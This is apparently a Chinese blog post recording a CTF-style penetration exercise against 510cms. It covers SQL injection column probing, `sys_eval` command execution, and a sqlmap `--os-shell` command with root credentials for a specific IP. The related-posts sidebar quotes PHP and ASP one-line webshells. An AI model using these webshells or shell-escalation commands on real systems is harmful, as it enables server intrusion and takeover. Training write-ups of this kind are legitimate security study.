510cms使用手工注入挂下一句话木马 中国菜刀 蚁剑 挂马连接510cms网站 分别使用navicat和sqlmap进行udf提权

已于 2022-04-12 16:31:15 修改
阅读量584 收藏
点赞数 1
文章标签: windows sql
于 2022-04-12 16:29:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanghao200108/article/details/124127485
版权
本文探讨了SQL注入攻击,通过orderby字段值为7的示例,揭示了回显位数为4的安全漏洞。利用该漏洞,攻击者可以执行如`Selectversion()`和`Selectsys_eval('cat/flag.txt')`等SQL命令。进一步,文章展示了如何利用sqlmap工具进行`mysql://root:root@159.75.16.25:3309/mysql`数据库的OS shell渗透。
摘要由CSDN通过智能技术生成

在这里插入图片描述
我们知道此处有注入 使用order by 确定他的字段值
在这里插入图片描述
在这里插入图片描述
order by 得出 字段值是7
在这里插入图片描述判断出来回显位数是4
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
Select version()
Select sys_eval(‘cat/flag。txt’)
在这里插入图片描述
sqlmap -d “mysql://root:root@159.75.16.25:3309/mysql” --os-shell

在这里插入图片描述

记录笔记
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
510cms企业网站系统
04-30
510cms企业网站系统源码,以PHP+MYSQL+smarty开发的企业网站,可供大家学习交流。 mysql需自己导入没有写安装程序! 后台地址为admin/login.php 账号和密码都为admin
利用网站上传漏洞使用一句话木马控制服务器
weixin_33962621的博客
06-18 1747
一句话木马 常用于php、asp、aspx php <?php echo shell_exec($_GET['cmd']);?> asp <%execute(request("value"))%> aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["value"...
利用Art2008cms漏洞渗透某站点
weixin_44023460的博客
07-20 164
单击“基本设置”-“添加文章”,在文章添加页面中单击“插入FLV视频”,选择一个已经更名为mdb的Webshell上传,如图2所示,选择文件后单击开始上传,上传完毕后会自动显示文件上传后的详细地址“/uploadfile/Media/201106/2011061515303758472.mdb”,记下该地址,留作后用。数据库恢复成功后,由于用来恢复的数据库是Webshell,非真实的数据库文件,因此当数据库恢复成功后,后台管理会保错,导致后台无法管理,网站也无法正常访问,如图5所示。CurrPath=…
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 31万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
后台登录密码绕过+sql注入+一句话木马 实验演示(盾灵)
hxxjxw的博客
07-09 1万+
环境 Windows Server 2008(虚拟机) 安装phpStudy,安装dunling 盾灵投稿系统 dunling是一个CMS在线内容管理器 dirb是Kali内置的一个基于字典的Web目录扫描工具,用来爆破目录的 假设已经知道管理员的登陆用户名是admin 实验演示 ①在Windows Server 2008中安装phpStudy,关闭防火墙 下载盾灵...
web安全基础--一句话木马笔记
m0_57291352的博客
05-04 1044
课程:https://www.bilibili.com/video/BV1VA411u7Tg?p=7 一句话木马 可执行脚本文件 可以是很多种语言php、jsp等等 需要满足三个条件:木马能成功上传到服务器、我们知道木马上传到服务器的路径、上传的木马能被解析执行。 例如 <?php @eval($_POST['cmd']);?> @是不报错的意思 以post方法获取cmd变量 eval()将括号里的按php代码执行 例如,传入cmd=phpinfo();,那么最后执行的就是<?php @
navicat下载、安装、配置连接使用教程&相关项目
最新发布
07-06
navicat】下载、安装、配置连接使用教程&相关项目
Windows7下安装使用MySQL8.0.16修改密码、连接Navicat问题
09-09
Windows 7操作系统环境下安装并使用MySQL 8.0.16版本时,用户可能会遇到一些问题,尤其是与密码修改及通过Navicat这类数据库管理工具连接数据库相关的问题。为了解决这些问题,并帮助用户顺利地使用MySQL,本文将...
MySQL数据库安装和Navicat for MySQL配合使用教程
09-09
总结来说,MySQL数据库是一款广泛使用的开源关系型数据库,Navicat for MySQL则是一个强大的图形化管理工具,两者结合,能有效提升数据库管理和开发的效率。在安装MySQL时,注意选择合适的配置以适应不同的工作环境...
详解使用navicat连接远程linux mysql数据库出现10061未知故障
09-09
主要介绍了navicat连接远程linux mysql数据库出现10061未知故障,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
小程序平台系统CMS源码一键生成带数据带文档
06-21
小程序平台系统CMS源码,可进行OEM代理招商,无需域名授权,里面附带多套小程序原生代码,带数据带文档
navicat下载、安装、配置连接使用教程.pdf
06-08
### Navicat 下载、安装、配置连接使用教程 #### 一、Navicat简介 Navicat 是一款功能强大的数据库管理和开发工具,广泛应用于各种数据库系统的管理和维护工作。它支持多种主流数据库系统,包括但不限于 MySQL、...
墨者学院-CMS系统漏洞分析溯源(第3题)
ploto_cs的博客
10-09 542
一.漏洞描述 在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,拿到shell 二.影响版本 新云CMS 4.0.0 SP1 三.漏洞复现 1.使用对域名进行探测 登录网址为http://219.153.49.228/login.asp 2.注册用户 在“密码问题”插入一句话木马 一句话木马为: <% execute request(“a”)%>” 经过Erlang 中文简体字 GB2312 转 unicode 转换来的 ┼攠數畣整爠煥敵瑳∨≡┩愾 3.检查木马是否上传成功
渗透测试-CMS网站数据库备份漏洞
道阻且长,行则将至。
08-09 1657
背景环境 背景介绍 安全工程师"墨者"的朋友搭建一个emlog个人博客系统,为了确保该系统的安全性,请你检测该系统是否存在安全漏洞。 实训目标 1、了解验证码绕过的相关知识; 2、了解后台地址扫描及其他相关漏洞资料; 3、了解后台常用账户密码的利用方式; 解题方向 进入后台,找到后台中可利用的地方getshell。 攻击过程 墨者学院在线靶机(动态地址): http://219.153.49.2...
php一句话木马调用cmd命令,一句话木马(webshell)是如何执行命令的
weixin_39617669的博客
03-09 2197
在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话木马。看到这里不得不赞美前辈的智慧。对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一...
510cms进行渗透测试,找到其中的3个flag
Alashan12的博客
04-08 4507
拿到网站 简单观察后发现url区域存在传参 简单测试找到存在注入的界面(此网站多处网址存在注入) 这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入 我们针对此界面(180.76.226.182/about.php?listid=6)使用sqlmap进行爆破 sqlmap -u 180.76.226.182/about.php?listid=6 --current-db 爆当前数据库名 得到数据库名为“510cms” 然后指定该数据库...
sql手注和udf提权
m0_53042636的博客
04-12 1009
1、510cms使用手工注入挂下一句话木马。操作步骤配截图。 http://159.75.16.25:88/about.php?listid=6 正常页面 http://159.75.16.25:88/about.php?listid=6‘ 异常页面 http://159.75.16.25:88/about.php?listid=6 and 1=1 – + 正常页面 http://159.75.16.25:88/about.php?listid=6 and 1=2 – + 异常页面 可以判断出为整形注入
510cms网站渗透测试
AmeV_ll的博客
01-23 1939
利用漏洞进行攻击分为漏洞挖掘、漏洞分析和漏洞利用三个步骤。漏洞挖掘是其他两个步骤的前提和基础,所以对于网络的攻防具有重要的意义。漏洞挖掘,顾名思义就是寻找漏洞,主要是通过综合应用各种技术和工具,尽可能地找出软件中的潜在漏洞,然而这并非一件很容易的事情,在很大程度上依赖于个人经验。根据分析对象的不同,漏洞挖掘技术可以分为基于源码的漏洞挖掘技术和基于目标代码的漏洞挖掘技术。
SQL注入之Bool盲注(510cms
qq_45775897的博客
01-05 2973
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
Navicat使用教程:连接与管理数据库对象
"Navicat使用手册涵盖了如何连接和操作MySQL、MariaDB、Oracle和PostgreSQL数据库的详细步骤和设置。" Navicat是一款强大的数据库管理工具,它提供了直观的界面来帮助用户连接到多种类型的数据库系统,包括MySQL、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值